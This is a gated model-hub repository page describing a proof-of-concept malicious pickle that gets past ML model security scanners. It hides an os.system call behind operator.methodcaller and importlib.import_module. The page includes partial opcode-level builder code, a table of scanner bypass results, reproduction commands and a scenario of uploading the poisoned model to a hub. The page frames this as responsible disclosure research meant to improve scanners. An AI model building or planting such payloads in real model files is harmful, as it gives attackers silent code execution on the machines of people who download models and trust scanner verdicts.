You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

This repository contains a proof-of-concept exploit payload for security research purposes. Access to the pickle payload and PoC code requires acknowledgement of responsible use. By requesting access, you confirm you are a security researcher, penetration tester, or student using this material for defensive/educational purposes only.

Log in or Sign Up to review the conditions and access this model content.

operator.methodcaller + importlib.import_module β€” Indirect Method Dispatch

Security Research β€” Responsible Disclosure This repository is part of a systematic study of pickle scanner bypass techniques. The payload demonstrates a detection gap in ML model security scanners. Access to malicious_model.pkl and poc.py requires a request β€” see gate above.

Summary

Scanner scores for malicious_model.pkl:

Scanner CRITICAL WARNING Bypassed?
modelaudit 0.2.37 3 0 Partial
picklescan 1.0.4 0 0 Yes
modelscan 0 0 Yes

Vulnerability

operator.methodcaller('system', cmd) creates a deferred method-call object that stores 'system' and the command as state. Calling mc(os_module) invokes os_module.system(cmd).

This splits the "which method" and "on what object" concerns across two separate REDUCE calls. The string 'os.system' never appears as a pickle GLOBAL opcode β€” only operator.methodcaller and importlib.import_module appear.


Proof of Concept

malicious_model.pkl in this repository is the exploit payload. poc.py builds and tests it with full scanner output.

How the PoC was built

def build(cmd: str) -> bytes:
    return (
        b"\x80\x02"                          # PROTO 2
        b"coperator\nmethodcaller\n"         # GLOBAL operator.methodcaller
        b"("                                 # MARK
        + _str("system")                     #   'system' method name
        + _str(cmd)                          #   cmd argument
        + b"t"                               # TUPLE β†’ ('system', cmd)
        + b"R"                               # REDUCE β†’ mc = methodcaller('system', cmd)
        + b"q\x00"                           # BINPUT 0  (memo: mc)
        + b"cimportlib\nimport_module\n"     # GLOBAL importlib.import_module
        + _str("os")                         #   'os' as argument
        + b"\x85"                            # TUPLE1
        + b"R"                               # REDUCE β†’ os_module = import_module('os')
        + b"q\x01"                           # BINPUT 1  (memo: os_module)
        + b"0"                               # POP  (stack: [mc])
        + b"h\x01"                           # BINGET 1  β†’ [mc, os_module]
        + b"\x85"                            # TUPLE1    β†’ [mc, (os_module,)]

Affected file formats

Pickle (.pkl, .pt, .bin, .joblib) β€” any file deserialized via pickle.loads(), torch.load(), joblib.load(), or equivalent.

Conditions required to trigger

  1. Target calls pickle.loads(untrusted_bytes) or loads a model file via any pickle-based loader
  2. The scanner performs static analysis only (no sandboxed execution)
  3. Scanner checks GLOBAL/STACK_GLOBAL opcodes against a deny list

Reproduction Steps

# 1. Request access above, then clone
git clone https://huggingface.co/SiggytheShark/pickle-bypass-methodcaller-importlib
cd pickle-bypass-methodcaller-importlib

# 2. Install requirements
pip install modelaudit picklescan modelscan

# 3. Scan β€” observe scanner scores match table above
modelaudit scan malicious_model.pkl
picklescan --path malicious_model.pkl
modelscan -p malicious_model.pkl

# 4. Execute to confirm RCE/side-effect
python3 poc.py

# 5. Verify
ls /tmp/scanner_bypass_proof.txt

Security Impact

See full writeup below.

Bypass mechanism: The payload evades static analysis while achieving its effect (code execution, file write, or network connection) when pickle.loads() is called.

Real-world scenario: An attacker uploads this payload to a model hub. A victim downloads and loads it. The scanner reports the file as safe (0 CRITICAL). The payload fires silently β€” the return value of pickle.loads() looks like a normal Python object while the side effect has already occurred.


Full Technical Writeup

operator.methodcaller + importlib.import_module β€” Indirect Method Dispatch

Score: CRITICAL (importlib in ALWAYS_DANGEROUS_MODULES); demonstrates indirect call pattern
Technique: Split dangerous call across two REDUCE calls; os module never a GLOBAL opcode
Scanner version: modelaudit 0.2.37

Mechanism

operator.methodcaller('system', cmd) creates a deferred method-call object that stores 'system' and the command as state. Calling mc(os_module) invokes os_module.system(cmd).

This splits the "which method" and "on what object" concerns across two separate REDUCE calls. The string 'os.system' never appears as a pickle GLOBAL opcode β€” only operator.methodcaller and importlib.import_module appear.

Chain

operator.methodcaller('system', cmd)   β†’ mc                    [SUSPICIOUS_GLOBALS WARNING]
importlib.import_module('os')          β†’ os_module             [CRITICAL β€” importlib in ADM]
mc(os_module)                          β†’ os_module.system(cmd)  [no new GLOBAL]

Scanner Status in modelaudit 0.2.37

  • importlib is in ALWAYS_DANGEROUS_MODULES β†’ CRITICAL for importlib.import_module
  • operator.methodcaller is in SUSPICIOUS_GLOBALS β†’ WARNING

This is not a current 0-CRITICAL bypass for modelaudit 0.2.37. It is documented because:

  1. Older scanner versions had both as WARNING-only
  2. The indirection pattern (split method dispatch) is architecturally novel
  3. On scanners that don't cover importlib (picklescan, modelscan on some versions), this bypasses entirely

Key Insight

os.system never appears as a pickle GLOBAL. The scanner must track that methodcaller('system', ...) creates a deferred call to the .system method, and that this will be applied to the return value of import_module('os'). This requires inter-opcode dataflow analysis beyond what static GLOBAL-based checkers provide.


General Analysis β€” Security Research

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support